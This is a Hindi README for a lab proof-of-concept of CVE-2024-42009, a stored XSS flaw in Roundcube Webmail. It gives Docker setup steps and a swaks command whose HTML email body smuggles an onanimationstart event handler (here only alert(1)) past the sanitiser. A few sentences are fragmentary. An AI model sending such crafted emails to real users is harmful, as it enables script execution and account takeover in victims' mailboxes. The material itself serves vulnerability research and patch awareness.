
CVE-2024-42009 के लिए Docker-आधारित प्रूफ-ऑफ-कॉन्सेप्ट, Roundcube Webmail में संग्रहीत XSS। तैयार HTML ईमेल के माध्यम से शोषण प्रदर्शित करता है और कमजोर प्रयोगशाला वातावरण के लिए सेटअप शामिल करता है।
यह रिपॉजिटरी CVE-2024-42009 के लिए एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट (PoC) प्रदर्शित करती है, जो Roundcube वेबमेल में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता है।
यह भेद्यता अनुचित HTML स्वच्छता और उसके बाद असुरक्षित विशेषता पुनर्प्रसंस्करण के कारण होती है, जिससे हमलावर तैयार किए गए HTML ईमेल के माध्यम से दुर्भावनापूर्ण ईवेंट हैंडलर इंजेक्ट कर सकते हैं।
Roundcube आने वाले HTML ईमेल को स्वच्छ करता है लेकिन बाद में कुछ विशेषताओं (जैसे, bgcolor, विकृत विशेषताएँ) को पुनः प्रसंस्कृत करता है, जिसके परिणामस्वरूप:
onanimationstart) का पुनः परिचययह पीड़ित द्वारा एक दुर्भावनापूर्ण ईमेल खोलने पर मनमाने JavaScript के निष्पादन की अनुमति देता है।
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ मेल सर्वर को आरंभ होने में लगभग 10-15 सेकंड प्रतीक्षा करें।
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
क्रेडेंशियल्स:
swaks टूल का उपयोग करके दुर्भावनापूर्ण ईमेल भेजें:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


पैच किए गए संस्करणों में अपग्रेड करें:
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। उचित अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।